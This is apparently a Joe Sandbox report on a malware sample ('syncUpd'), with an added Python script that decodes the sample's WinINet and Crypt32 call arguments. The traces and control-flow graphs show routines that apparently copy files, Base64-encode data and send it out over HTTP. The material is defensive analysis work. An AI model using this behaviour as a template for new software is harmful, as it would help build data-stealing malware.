                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0071C0A0), ref: 004169FB
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,0071C240), ref: 00416A14
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,007247E0), ref: 00416A2C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75BD0000,007247F8), ref: 00416A44
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,0071C200), ref: 00416A66
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,00724810), ref: 00416A7E
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,00724960), ref: 00416A96
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,00724AB0), ref: 00416AAF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75A70000,00724B58), ref: 00416AC7
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000,0071C2E0), ref: 00416AE8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75450000,0071C0C0), ref: 00416B01
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75DA0000,0071C280), ref: 00416B22
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75DA0000,007249A8), ref: 00416B3A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C260), ref: 00416B60
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C180), ref: 00416B78
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C380), ref: 00416B90
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,00724918), ref: 00416BA9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C1A0), ref: 00416BC1
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C100), ref: 00416BD9
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C3C0), ref: 00416BF2
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F090000,0071C1C0), ref: 00416C0A
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,00724888), ref: 00416C2B
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,0071D958), ref: 00416C44
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,00724A98), ref: 00416C5C
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AF0000,007248E8), ref: 00416C74
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75D90000,0071C080), ref: 00416C96
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,00724870), ref: 00416CB7
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,0071C2A0), ref: 00416CCF
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,007249C0), ref: 00416CE8
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6C630000,00724A68), ref: 00416D00
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                  • String ID: Gr$(Er$(Hr$0Fr$8Gr$@Er$HFr$PGr$XEr$XKr$`Fr$`Ir$hDr$hGr$hJr$pEr$pHr$xFr$Dr$Er$Gr$Hr
                                                                                                                                                                                                                                  • API String ID: 2238633743-1839564293
                                                                                                                                                                                                                                  • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                  • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Control-flow Graph

Control-flow graph of the function at 404dc0 (block id, address range, then the calls made in that block; edges are listed after the blocks):

• 179 404dc0-404ee1: call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA
• 202 404ee3
• 203 404eea-404eee
• 204 404ef4-405007: call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA
• 205 405578-40560a: InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00
• 268 40500d-40501b
• 269 405029
• 270 40501d-405027
• 271 405033-405065: HttpOpenRequestA
• 272 40556b-405572: InternetCloseHandle
• 273 40506b-4054e5: call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070
• 427 4054ea-405514: InternetReadFile
• 428 405516-40551d
• 429 40551f-405565: InternetCloseHandle
• 431 405521-40555f: call 416fb0 call 416ea0 call 416e00

Edges: 179->202, 179->203, 202->203, 203->204, 203->205, 204->205, 204->268, 268->269, 268->270, 269->271, 270->271, 271->272, 271->273, 272->205, 273->427, 427->428, 427->429, 428->429, 428->431, 429->272, 431->427
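The graph above is the shape of a WinINet request loop (InternetOpenA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, then InternetReadFile until it returns nothing, then InternetCloseHandle), and the argument values the sandbox logged for those calls say more than the names do. The script below is an added example, not part of the Joe Sandbox report or of the sample's own code: it parses lines in the report's "• API.MODULE(args), ref: addr" format (including the "Part of subcall function" prefix) and decodes the flag and enum arguments of the WinINet and Crypt32 calls seen in this routine. Constant values come from the public Windows SDK headers; the embedded sample lines are copied from the listings on this page, and arguments the sandbox printed as "?" (such as the InternetConnectA port) are kept as unknown rather than guessed.

```python
"""Parse Joe Sandbox API trace lines and decode WinINet / Crypt32 argument flags.
Added example; not part of the Joe Sandbox report or the analysed sample."""
import re
from collections import Counter

# One trace line:  • HttpOpenRequestA.WININET(00000000,0071DC78,?,...), ref: 00405058
# optionally prefixed with "Part of subcall function 00416DA0:".
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Constants from <wininet.h> and <wincrypt.h>.
INTERNET_FLAGS = {
    0x80000000: "INTERNET_FLAG_RELOAD",
    0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE",
    0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT",
    0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI",
    0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_SERVICE = {1: "INTERNET_SERVICE_FTP", 2: "INTERNET_SERVICE_GOPHER", 3: "INTERNET_SERVICE_HTTP"}
INTERNET_OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
CRYPT_STRING_FORMAT = {0: "CRYPT_STRING_BASE64HEADER", 1: "CRYPT_STRING_BASE64", 4: "CRYPT_STRING_HEX"}
CRYPT_STRING_FLAGS = {0x40000000: "CRYPT_STRING_NOCRLF", 0x80000000: "CRYPT_STRING_NOCR"}

# Sample input: lines copied from the API listings of this report.
SAMPLE = """\
• GetProcAddress.KERNEL32(74DD0000,007246F0), ref: 0041654F
• GetProcAddress.KERNEL32(74DD0000,00724498), ref: 00416568
• LoadLibraryA.KERNEL32(00724570,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
• GetProcAddress.KERNEL32(75290000,0071C320), ref: 0041670A
  • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
• StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
• HttpOpenRequestA.WININET(00000000,0071DC78,?,00726330,00000000,00000000,00400100,00000000), ref: 00405058
"""


def parse_trace(text):
    """Return one dict per trace line; arguments stay as raw strings ('?' = unknown)."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append({"api": m["api"], "module": m["mod"], "args": args,
                      "ref": int(m["ref"], 16), "subcall": m["sub"]})
    return calls


def _hex(arg):
    """Trace arguments are hex without 0x; '?' and non-hex literals yield None."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_bitflags(value, table):
    """Split a DWORD into the named bits of `table`; bits not in the table are kept as hex."""
    names = [name for bit, name in sorted(table.items(), reverse=True) if value & bit]
    known = 0
    for bit in table:
        known |= bit
    if value & ~known:
        names.append(f"0x{value & ~known:08X}")
    return names


def describe(call):
    """Meaning of the flag/enum arguments of the APIs used by this routine (by SDK signature position)."""
    api, a = call["api"], call["args"]
    notes = {}
    if api == "InternetOpenA" and len(a) > 1:            # (agent, dwAccessType, proxy, bypass, flags)
        notes["dwAccessType"] = INTERNET_OPEN_TYPE.get(_hex(a[1]), a[1])
    elif api == "InternetConnectA" and len(a) > 5:       # (h, server, nServerPort, user, pass, nService, ...)
        notes["nServerPort"] = _hex(a[2]) if _hex(a[2]) is not None else a[2]
        notes["nService"] = INTERNET_SERVICE.get(_hex(a[5]), a[5])
    elif api == "HttpOpenRequestA" and len(a) > 6 and _hex(a[6]) is not None:  # dwFlags is arg 7
        notes["dwFlags"] = decode_bitflags(_hex(a[6]), INTERNET_FLAGS)
    elif api == "CryptBinaryToStringA" and len(a) > 2 and _hex(a[2]) is not None:  # dwFlags is arg 3
        v = _hex(a[2])
        notes["dwFlags"] = [CRYPT_STRING_FORMAT.get(v & 0xFFFF, f"0x{v & 0xFFFF:X}")]
        notes["dwFlags"] += decode_bitflags(v & 0xFFFF0000, CRYPT_STRING_FLAGS)
    return notes


def wininet_sequence(calls):
    """Direct (non-subcall) WININET calls in address order: the shape of the request routine."""
    direct = [c for c in calls if c["module"] == "WININET" and c["subcall"] is None]
    return [c["api"] for c in sorted(direct, key=lambda c: c["ref"])]


def imports_per_module(calls):
    """GetProcAddress calls counted per module base: how much the sample resolves at run time."""
    return Counter(c["args"][0] for c in calls if c["api"] == "GetProcAddress" and c["args"])


if __name__ == "__main__":
    calls = parse_trace(SAMPLE)
    for c in calls:
        print(f"{c['ref']:08X} {c['api']}.{c['module']} {describe(c)}")
    print("WinINet sequence:", " -> ".join(wininet_sequence(calls)))
    print("GetProcAddress per module base:", dict(imports_per_module(calls)))
```

Run against the lines on this page it reports HttpOpenRequestA with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE, InternetConnectA with INTERNET_SERVICE_HTTP, InternetOpenA with INTERNET_OPEN_TYPE_DIRECT, and the CryptBinaryToStringA helper producing single-line Base64 (CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF); the same parser can be pointed at the full GetProcAddress listing above to count how many exports are resolved from each module base.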
APIs
  • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
  • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
  • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
• lstrlen.KERNEL32(00000000), ref: 00404E4A
  • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
  • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
• StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
• HttpOpenRequestA.WININET(00000000,0071DC78,?,00726330,00000000,00000000,00400100,00000000), ref: 00405058
  • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
  • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
  • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
  • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
  • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
  • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
• lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,0071DB98,00000000,?,0071FCE8,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
• lstrlen.KERNEL32(00000000), ref: 004053FF
• GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
• HeapAlloc.KERNEL32(00000000), ref: 00405417
• lstrlen.KERNEL32(00000000), ref: 0040542C
• memcpy.MSVCRT ref: 00405443
• lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
• memcpy.MSVCRT ref: 0040546A
• lstrlen.KERNEL32(00000000), ref: 0040547C
• lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
• memcpy.MSVCRT ref: 004054A5
• lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
• InternetCloseHandle.WININET(00000000), ref: 00405565
• InternetCloseHandle.WININET(00000000), ref: 00405572
• InternetCloseHandle.WININET(00000000), ref: 0040557C
Strings
Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
Yara matches
Similarity
• API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
• String ID: ------$"$"$"$--$------$------$------$0cr$8me
• API String ID: 2633831070-1632710934
• Opcode ID: f9c74c8bd5b162ad2116968dca9dbc9c19983fe21bb72298214c6830a7feb551
• Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
• Opcode Fuzzy Hash: f9c74c8bd5b162ad2116968dca9dbc9c19983fe21bb72298214c6830a7feb551
• Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                    • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0071DC68), ref: 004056C3
                                                                                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,0071DB68,00000000,?,0071FCE8,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                                                                                                  • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                                                                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                                                                                                  • HttpOpenRequestA.WININET(00000000,0071DC78,?,00726330,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                                                                                  • String ID: "$"$------$------$------$0cr$8me$-A$-A
                                                                                                                                                                                                                                  • API String ID: 148854478-1255095679
                                                                                                                                                                                                                                  • Opcode ID: 6882fe96c5024c80168a13641c85f07ff7a62da7ee737cdc8278628239c8db15
                                                                                                                                                                                                                                  • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6882fe96c5024c80168a13641c85f07ff7a62da7ee737cdc8278628239c8db15
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

Control-flow Graph (one basic block per line, followed by the edges that leave it)

control_flow_graph
1075 40a030-40a04c call 417070
1078 40a05d-40a071 call 417070
1075->1078
1079 40a04e-40a05b call 416e20
1075->1079
1085 40a082-40a096 call 417070
1078->1085
1086 40a073-40a080 call 416e20
1078->1086
1084 40a0bd-40a128 call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2
1079->1084
1118 40a12d-40a134
1084->1118
1085->1084
1094 40a098-40a0b8 call 416e00 * 3 call 413220
1085->1094
1086->1084
1112 40a6cf-40a6d2
1094->1112
1119 40a170-40a184 call 416d40
1118->1119
1120 40a136-40a152 call 4170d0 * 2 CopyFileA
1118->1120
1125 40a231-40a314 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2
1119->1125
1126 40a18a-40a22c call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00
1119->1126
1133 40a154-40a16e call 416da0 call 415bd0
1120->1133
1134 40a16c
1120->1134
1184 40a319-40a331 call 4170d0
1125->1184
1126->1184
1133->1118
1134->1119
1194 40a680-40a692 call 4170d0 DeleteFileA call 417040
1184->1194
1195 40a337-40a355
1184->1195
1205 40a697-40a6ca call 417040 call 416e00 * 5 call 413220
1194->1205
1203 40a666-40a676
1195->1203
1204 40a35b-40a36f GetProcessHeap RtlAllocateHeap
1195->1204
1214 40a67d
1203->1214
1206 40a372-40a382
1204->1206
1205->1112
1211 40a601-40a60e lstrlen
1206->1211
1212 40a388-40a42a call 416d40 * 6 call 417070
1206->1212
1215 40a610-40a642 lstrlen call 416da0 call 401500 call 404dc0
1211->1215
1216 40a655-40a663 memset
1211->1216
1254 40a42c-40a43b call 416e20
1212->1254
1255 40a43d-40a446 call 416e20
1212->1255
1214->1194
1232 40a647-40a650 call 416e00
1215->1232
1216->1203
1232->1216
1258 40a44b-40a45d call 417070
1254->1258
1255->1258
1262 40a470-40a479 call 416e20
1258->1262
1263 40a45f-40a46e call 416e20
1258->1263
1267 40a47e-40a48e call 4170b0
1262->1267
1263->1267
1270 40a490-40a498 call 416e20
1267->1270
1271 40a49d-40a5fc call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4097f0 call 4170d0 lstrcat call 416e00 lstrcat call 416e00 * 6
1267->1271
1270->1271
1271->1206
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0071C6F8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                    • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040A65D
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                                                                                                  Memory Dump Source
• Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmp
• Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmp
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
